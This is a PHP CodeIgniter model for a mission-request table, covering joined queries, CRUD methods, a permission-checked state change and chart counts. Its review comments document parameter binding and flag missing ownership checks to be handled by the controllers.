<?php
/* 
 * Generated by CRUDigniter v3.2 
 * www.crudigniter.com
 */
 
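/**
 * Data-access model for the `mission` table and its lookup joins
 * (typemission, objetmission, transport, societe, users, affectation, fonction).
 *
 * NOTE(review): apart from update_etat() and the role filter in
 * get_all_mission(), no method here checks who is asking. The single-row
 * getters, update_mission() and delete_mission() act on any id they are given,
 * so the calling controller has to verify authentication and ownership.
 * Confirm against the controllers; they are not visible from this file.
 */
class Mission_model extends CI_Model
{
    function __construct()
    {
        parent::__construct();
    }

    /**
     * Compare two identifiers, failing closed on missing values.
     *
     * A plain `==` treats two nulls as equal, which would let an absent
     * session id match an absent responsable/interim id. This helper returns
     * true only when both sides are non-empty scalars with the same string form.
     *
     * @param mixed $left
     * @param mixed $right
     * @return bool
     */
    private function _same_id($left, $right)
    {
        if (!is_scalar($left) || !is_scalar($right)) {
            return false;
        }
        $l = (string) $left;
        $r = (string) $right;
        return $l !== '' && $l === $r;
    }

    /**
     * Normalise a caller-supplied date to `Y-m-d`.
     *
     * The value goes through strtotime()/date(), so the returned string holds
     * only digits and dashes. Unparseable input makes strtotime() return false
     * and therefore yields 1970-01-01, as the original inline expression did.
     *
     * @param mixed $value
     * @return string
     */
    private function _to_sql_date($value)
    {
        return date("Y-m-d", strtotime($value));
    }

    /**
     * Apply the select list and joins shared by the mission list queries.
     *
     * `*` expands to every column of every joined table. Same-named columns
     * (each table has an `id`) collapse to one key in the result array, which
     * is why `idmission` is aliased explicitly.
     * NOTE(review): `*` also returns every column of `users`; if that table
     * stores credentials they travel with each row. Consider an explicit
     * column list once the consumers of these rows are known.
     */
    private function _mission_list_query()
    {
        $this->db->order_by("mission.id", "desc");
        $this->db->select("*,users.nom as name,typemission.libelle as typemission,objetmission.libelle as objetmission ,transport.libelle as transport , mission.id as idmission , (select concat(users.nom,' ',users.prenom) from users  where users.id=mission.interim_id) as interim , mission.description as description, societe.nom as depart");
        $this->db->from('mission');
        $this->db->join('typemission', 'typemission.id = mission.typemission_id');
        $this->db->join('objetmission', 'objetmission.id = mission.objetmission_id');
        $this->db->join('transport', 'transport.id = mission.transport_id');
        $this->db->join('societe', 'societe.id = mission.depart_id');
        $this->db->join('users', 'users.id = mission.users_id');
    }

    /**
     * Get mission by id.
     *
     * @param mixed $id mission primary key (bound by the query builder)
     * @return array|null the row, or null when no mission has this id
     */
    function get_mission($id)
    {
        return $this->db->get_where('mission', array('id' => $id))->row_array();
    }

    /**
     * List missions whose creationdate falls within [$datedebut, $datefin],
     * newest first.
     *
     * @param mixed $datedebut start date, any format strtotime() accepts
     * @param mixed $datefin   end date, any format strtotime() accepts
     * @return array list of joined mission rows
     */
    function get_all_mission_by_date($datedebut, $datefin)
    {
        $this->db->where('creationdate >=', $this->_to_sql_date($datedebut));
        $this->db->where('creationdate <=', $this->_to_sql_date($datefin));
        // The original issued the same order_by twice; once is enough.
        $this->_mission_list_query();

        return $this->db->get()->result_array();
    }

    /**
     * Fetch one mission with validator, interim and job-title data for PDF output.
     *
     * Join order is kept exactly as found: with `*` in the select list, the
     * table order decides which same-named column survives in the row array.
     *
     * @param mixed $id mission primary key (bound by the query builder)
     * @return array|null first matching row, or null
     */
    function get_mission_to_pdf($id)
    {
        $this->db->select("*,(select concat(nom,' ',prenom) from users where users.id= mission.updatedby) as validator ,typemission.libelle as typemission,objetmission.libelle as objetmission ,transport.libelle as transport , mission.id as idmission , (select concat(users.nom,' ',users.prenom) from users  where users.id=mission.interim_id) as interim, fonction.libelle as poste, mission.description as motif, societe.nom as depart");

        $this->db->from('mission');
        $this->db->join('typemission', 'typemission.id = mission.typemission_id');
        $this->db->join('societe', 'societe.id = mission.depart_id');
        $this->db->join('objetmission', 'objetmission.id = mission.objetmission_id');
        $this->db->join('transport', 'transport.id = mission.transport_id');
        $this->db->join('users', 'users.id = mission.users_id');
        $this->db->join('affectation', 'users.id = affectation.users_id');
        $this->db->join('fonction', 'fonction.id = affectation.fonction_id');
        $this->db->where("mission.id", $id);

        return $this->db->get()->row_array();
    }

    /**
     * Fetch one mission with validator, interim and job-title data for the
     * "externe" view. Same shape as get_mission_to_pdf(); select and join
     * order are kept as found for the reason given there.
     *
     * @param mixed $id mission primary key (bound by the query builder)
     * @return array|null first matching row, or null
     */
    function get_mission_to_externe($id)
    {
        $this->db->select("*,(select concat(nom,' ',prenom) from users where users.id= mission.updatedby) as validator ,typemission.libelle as typemission,objetmission.libelle as objetmission ,transport.libelle as transport , mission.id as idmission , (select concat(users.nom,' ',users.prenom) from users  where users.id=mission.interim_id) as interim , mission.description as motif, fonction.libelle as poste, societe.nom as depart");
        $this->db->from('mission');
        $this->db->join('typemission', 'typemission.id = mission.typemission_id');
        $this->db->join('objetmission', 'objetmission.id = mission.objetmission_id');
        $this->db->join('societe', 'societe.id = mission.depart_id');
        $this->db->join('transport', 'transport.id = mission.transport_id');
        $this->db->join('users', 'users.id = mission.users_id');
        $this->db->join('affectation', 'users.id = affectation.users_id');
        $this->db->join('fonction', 'fonction.id = affectation.fonction_id');
        $this->db->where("mission.id", $id);

        return $this->db->get()->row_array();
    }

    /**
     * Get all mission count.
     *
     * @return int
     */
    function get_all_mission_count()
    {
        $this->db->from('mission');
        return $this->db->count_all_results();
    }

    /**
     * Get all missions visible to the caller, newest first.
     *
     * Role handling, as the code implements it:
     *   - $role == 0: only the session user's own missions;
     *   - $role == 1: the session user's missions plus those of the users
     *     returned by User_model::get_all_users_for_responsable(), unless
     *     $params['readException'] is truthy, which lifts the filter;
     *   - any other value (including the default -1): no user filter.
     * NOTE(review): $role and readException come from the caller; the
     * controller must derive them from the authenticated session, never
     * from request input.
     *
     * @param array $params optional 'limit', 'offset', 'readException'
     * @param mixed $role   see above
     * @return array list of joined mission rows
     */
    function get_all_mission($params = array(), $role = -1)
    {
        $own_only  = ($role == 0);
        $team_only = ($role == 1 && empty($params['readException']));

        if ($own_only || $team_only) {
            $user = $this->session->userdata("auth");
            // Fail closed before touching the query builder: without a session
            // user id there is nothing this caller is allowed to see.
            if (!is_array($user) || !isset($user["iduser"]) || $user["iduser"] === '') {
                return array();
            }

            if ($own_only) {
                // The original applied this same filter twice.
                $this->db->where("users_id", $user["iduser"]);
            } else {
                $this->load->model('User_model');
                $subusers = $this->User_model->get_all_users_for_responsable($user["iduser"]);

                // where_in() escapes each id; the original concatenated them
                // into a raw "users_id=… or …" string.
                $ids = array($user["iduser"]);
                foreach ((array) $subusers as $value) {
                    $ids[] = $value["id"];
                }
                $this->db->where_in('users_id', $ids);
            }
        }

        // Paginate only when a limit was actually supplied; $params may carry
        // nothing but readException.
        if (isset($params['limit'])) {
            $this->db->limit($params['limit'], isset($params['offset']) ? $params['offset'] : 0);
        }

        $this->_mission_list_query();

        return $this->db->get()->result_array();
    }

    /**
     * Insert a new mission.
     *
     * NOTE(review): $params is written as-is, so every key becomes a column.
     * The caller should pass an explicit set of fields rather than raw
     * request data, otherwise etat/isupdated/updatedby can be set on create.
     *
     * @param array $params column => value
     * @return int id of the inserted row
     */
    function add_mission($params)
    {
        $this->db->insert('mission', $params);
        return $this->db->insert_id();
    }

    /**
     * Update a mission by id.
     *
     * NOTE(review): no ownership or state check happens here and $params is
     * written as-is; see add_mission() for the field-list caveat.
     *
     * @param mixed $id
     * @param array $params column => value
     * @return bool
     */
    function update_mission($id, $params)
    {
        $this->db->where('id', $id);
        return $this->db->update('mission', $params);
    }

    /**
     * Change a mission's state on behalf of the session user.
     *
     * Allowed only when all of the following hold:
     *   - a session user exists and the mission exists;
     *   - the user is not the mission owner, or is the owner with type 1;
     *   - the user is the owner's responsable or interim;
     *   - the mission has not been decided yet (isupdated == 0), or the new
     *     state is 3, which the original condition lets through regardless
     *     of isupdated.
     *
     * @param mixed $id   mission id
     * @param mixed $etat new state
     * @return bool result of the update, or false when refused
     */
    function update_etat($id, $etat)
    {
        $user = $this->session->userdata("auth");
        if (!is_array($user) || !isset($user["iduser"])) {
            return false;
        }

        $mission = $this->get_mission($id);
        if (empty($mission) || !isset($mission["id"])) {
            // The original went on to index a null row here.
            return false;
        }

        $this->load->model("User_model");
        $responsable = $this->User_model->get_user_responsable($mission["users_id"]);
        $interim = $this->User_model->get_user_interim($mission["users_id"]);

        $responsable_id = (is_array($responsable) && isset($responsable["id"])) ? $responsable["id"] : null;
        $interim_id     = (is_array($interim) && isset($interim["id"])) ? $interim["id"] : null;

        $is_owner = $this->_same_id($user["iduser"], $mission["users_id"]);
        $may_act_on_owner = !$is_owner || (isset($user["type"]) && $user["type"] == 1);

        // _same_id() refuses empty ids, so a missing responsable or interim
        // can never match the caller.
        $is_validator = $this->_same_id($user["iduser"], $responsable_id)
            || $this->_same_id($user["iduser"], $interim_id);

        $state_allows = ($mission["isupdated"] == 0) || ($etat == 3);

        if (!($may_act_on_owner && $is_validator && $state_allows)) {
            return false;
        }

        $params = array(
            "etat" => $etat,
            "isupdated" => 1,
            "updatedby" => $user["iduser"]
        );
        $this->db->where('id', $id);
        return $this->db->update('mission', $params);
    }

    /**
     * Delete a mission by id.
     *
     * NOTE(review): no ownership check here; the caller must authorise.
     *
     * @param mixed $id
     * @return mixed result of the query builder delete
     */
    function delete_mission($id)
    {
        return $this->db->delete('mission', array('id' => $id));
    }

    /**
     * Pie chart data: number of missions per state (0-3), optionally limited
     * to a creationdate range when both dates are given.
     *
     * @param mixed $datedebut start date or null
     * @param mixed $datefin   end date or null
     * @return array state => array(value, color, highlight, label)
     */
    function ChartEtat($datedebut = null, $datefin = null)
    {
        $condition = "";
        $date_binds = array();
        if ($datedebut != null && $datefin != null) {
            // Dates are passed as bound parameters instead of being spliced
            // into the SQL text.
            // NOTE(review): the trailing space in the second format string is
            // kept as found; confirm it is intended.
            $condition = " and  creationdate>=STR_TO_DATE(?, '%Y-%m-%d') and   creationdate<=STR_TO_DATE(?, '%Y-%m-%d ')";
            $date_binds = array(
                $this->_to_sql_date($datedebut),
                $this->_to_sql_date($datefin)
            );
        }

        $slices = array(
            0 => array("color" => "#d2d6de", "label" => "En Attente"),
            1 => array("color" => "#00a65a", "label" => "Confirmé"),
            2 => array("color" => "#f56954", "label" => "Rejeté"),
            3 => array("color" => "#f39c12", "label" => "Annulé"),
        );

        $etats = array();
        foreach ($slices as $etat => $slice) {
            $row = $this->db->query(
                "select count(etat) as number from mission where etat=?" . $condition,
                array_merge(array($etat), $date_binds)
            )->row_array();

            $etats[$etat] = array(
                "value" => $row["number"],
                "color" => $slice["color"],
                "highlight" => $slice["color"],
                "label" => $slice["label"]
            );
        }

        return $etats;
    }
}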